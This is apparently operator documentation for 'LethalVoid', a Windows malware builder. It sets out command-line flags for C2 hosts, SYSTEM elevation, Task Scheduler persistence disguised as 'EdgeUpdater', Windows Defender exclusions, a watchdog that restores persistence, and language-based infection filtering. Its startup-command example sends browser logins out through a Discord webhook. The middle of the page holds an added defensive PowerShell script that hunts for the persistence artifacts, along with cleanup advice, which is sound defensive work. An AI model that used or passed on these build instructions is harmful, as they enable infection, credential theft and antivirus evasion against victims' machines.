Builder
The LethalVoid builder generates the encryption keys for the payload at build time and applies randomized instruction substitution, so every build has a unique signature. Because of this randomization, Windows Defender occasionally flags a particular build as malware; this is rare and is resolved by simply rebuilding the payload.
Commandline formatting on Windows
On Windows (at least in many of the built-in shells), values that contain a dot (such as the output path or host IPs) must always be enclosed in double quotes so that they are interpreted as a single argument. Example:
-h="127.0.0.1" -o="myprogram.exe"
Format
The LethalVoid builder can produce an executable containing the full loader, which provides persistence and privilege elevation, with the payload encrypted inside it.
It can also build just the raw, unencrypted payload, either as an EXE or as a DLL; the DLL variant executes from DllMain as soon as it is loaded.
When choosing either payload-only format, note that some features are not supported: payload-only builds have no built-in persistence, since persistence requires SYSTEM-level access, which they also cannot obtain.
-f --format=<exe/payloadexe/payloaddll> specifies build format (-t/-d/-P/-E not supported in payload-only formats)
Host & Port
-h --host=<ip/domain> specifies host to connect to (";" split list)
-p --port=<port> specifies host port to connect to (";" split list)
To specify the host IPs/domains and ports the executable will attempt to connect to, use the -h/--host and -p/--port flags.
Up to 30 hosts and ports can be specified (see Lists below for the list syntax).
Keep in mind that the payload attempts to connect to one host at a time, looping over them, so the more hosts specified, the longer it may take for the payload to reach the server.
The number of hosts and ports must be the same, as each port corresponds to exactly one host.
Example:
-h="127.0.0.1;30.168.0.198;112.71.31.192" -p="8000;2001;12345"
Persistence, Elevation, Watchdog & Tasks
-S --system makes loader elevate itself to SYSTEM
-P --persistent executable should run on system start
-i --install=<path> specifies install path
-E --exclude executable should add install path to the Windows Defender exclusions
-t --task=<name> specifies name of task used in task scheduler (only used if persistent flag is set)
-r --description=<description> specifies description of task used in task scheduler (only used if persistent flag is set)
-W --watchdog enables a detached thread that will keep enforcing persistence if any of the persistent files are removed
- Before persistence can be established, LethalVoid requires administrative privileges. To make the LethalVoid payload elevate to Administrator, migrate into a critical process and then elevate itself to SYSTEM, use the -S/--system flag.
- To gain persistence, the loader uses the Windows Task Scheduler; persistence is enabled with the -P/--persistent flag.
- Persistence also requires a file to be placed on disk; its path is set with -i/--install. The default path is C:\ProgramData\Edge\01\wmfs.png. Any directories in this path that do not exist are created automatically.
- To add the directory containing this file to the Windows Defender exclusions, use the -E/--exclude flag. This is convenient in case a future Windows version starts flagging the persistent file as malware: with this flag enabled, Defender simply ignores the file.
- The task name and its description can be set with the -t/--task (default: EdgeUpdater) and -r/--description (default: empty) flags.
- If the file used for persistence is deleted for whatever reason, the watchdog thread (created at LethalVoid start, if enabled) writes the file to the same location on disk again and re-creates the task if necessary. This feature is enabled with -W/--watchdog.
Example:
-i="C:\\MyDirectory\\.notsuspicious.jpg" --task="MyTask" -r="This task starts LethalVoid on this infected machine" -S -P -E -W
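The persistence mechanism described above leaves three artifacts on a host that a defender can check for: a scheduled task (default name EdgeUpdater), a file on disk (default path C:\ProgramData\Edge\01\wmfs.png) and, when -E was used, a Defender path exclusion for that directory. The following PowerShell script is an added example written for this page, not code from LethalVoid or its builder. It assumes the default -i and -t values documented above, the standard Windows cmdlets Get-ScheduledTask, Get-MpPreference and Get-WinEvent, and that it is run from an elevated prompt; a build that used custom -i/-t values will not match the name and path checks, so the exclusion and event-log checks are the broader signals.

```powershell
# Added hunting check for the persistence artifacts documented on this page.
# Example code, not part of LethalVoid or its builder. Run elevated.

$DefaultInstallPath = 'C:\ProgramData\Edge\01\wmfs.png'   # default -i/--install value
$DefaultTaskName    = 'EdgeUpdater'                         # default -t/--task value
$findings = @()

# 1. Scheduled task with the default name (persistence via Task Scheduler, -P)
$task = Get-ScheduledTask -TaskName $DefaultTaskName -ErrorAction SilentlyContinue
if ($task) {
    $actions = ($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join '; '
    $findings += "Scheduled task '$DefaultTaskName' present in $($task.TaskPath) -> $actions"
}

# 2. Any task whose action points into the default install directory
#    (catches a custom -t name combined with the default -i path)
Get-ScheduledTask -ErrorAction SilentlyContinue | ForEach-Object {
    $t = $_
    foreach ($a in $t.Actions) {
        if ("$($a.Execute) $($a.Arguments)" -like '*ProgramData\Edge*') {
            $findings += "Task '$($t.TaskName)' runs from ProgramData\Edge: $($a.Execute) $($a.Arguments)"
        }
    }
}

# 3. The persistent file itself. The page does not state its format, so the
#    "MZ" header test is only a heuristic hint that a .png is really a PE.
if (Test-Path -LiteralPath $DefaultInstallPath) {
    $bytes = [System.IO.File]::ReadAllBytes($DefaultInstallPath)
    $isPe  = ($bytes.Length -ge 2 -and $bytes[0] -eq 0x4D -and $bytes[1] -eq 0x5A)
    $info  = Get-Item -LiteralPath $DefaultInstallPath
    $findings += "File $DefaultInstallPath exists ($($info.Length) bytes, written $($info.LastWriteTime), MZ header: $isPe)"
}

# 4. Defender path exclusions (-E adds the install directory)
$prefs = Get-MpPreference -ErrorAction SilentlyContinue
if ($prefs) {
    foreach ($p in @($prefs.ExclusionPath)) {
        if ($p -like '*ProgramData\Edge*') { $findings += "Defender path exclusion: $p" }
    }
}

# 5. Defender event 5007 records configuration changes, including exclusions
#    being added; this also catches exclusions for a custom -i directory.
$evts = Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-Windows Defender/Operational'; Id = 5007
} -ErrorAction SilentlyContinue
foreach ($e in $evts) {
    if ($e.Message -match 'Exclusions\\Paths') {
        $first = ($e.Message -split "`r?`n")[0]
        $findings += "Defender exclusion change at $($e.TimeCreated): $first"
    }
}

if ($findings.Count -eq 0) {
    'No LethalVoid default persistence artifacts found.'
} else {
    $findings | ForEach-Object { "[!] $_" }
}
```

Because the -W watchdog rewrites the file and re-creates the task when either is removed, deleting the artifacts alone is not a cleanup: the running loader process has to be stopped first, and the Defender exclusion removed, before the task and file are deleted.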
Startup commands
-s --startup commands to run on startup before creating a connection to server (";" split list)
To specify commands that are executed when the LethalVoid payload starts, use the -s/--startup flag.
These commands run before the payload attempts to connect to any of the servers passed to the host flag.
To retrieve a command's output despite this, the exfiltration commands (discordsend and ftpsend) can be used.
Some commands that require a connected LethalVoid server will not work with this flag, such as upload, memexec and ransom (when used with a ransom note and/or wallpaper).
Example:
-s="cd %USERPROFILE%;discordsend MYWEBHOOK \"getbrowser all logins\""
Infection filtering by region
-l --langs LANGIDs for which LethalVoid will not execute, e.g. en-US (";" split list)
Users can specify region format settings (read via GetUserDefaultLangID) on which LethalVoid will neither establish persistence nor execute any commands; it simply exits upon execution.
This is set with the -l/--langs flag; LangID values are listed in Microsoft's language identifier documentation.
You can specify up to 30 different LangIDs, separated by the ';' character (see Lists).
Example:
-l="en-US;ru-RU;sv-SE;uk-UA;az-Latn-AZ"
Groups
-g --group=<group name> specifies name of group machines infected by this payload belong to
This sets the "group" variable embedded in the payload. It has no effect other than organizational: the group of each client is visible on the server.
Example:
-g="experimental group"
Output
-o --output=<path> specifies output file
Specifies the name of the file written when the build completes.
Example:
-o="myprogram.exe"
Flags
In the LethalVoid builder, flags that take a value follow the notation -x=value; this is the same for both the long and the short names of flags.
Lists
For some options in the builder, such as hosts and langs, you can specify single items as well as lists of items.
To do this, make sure the value is enclosed in quotes and each element is separated by a ';' character. For example: -x="value1;value2;value3"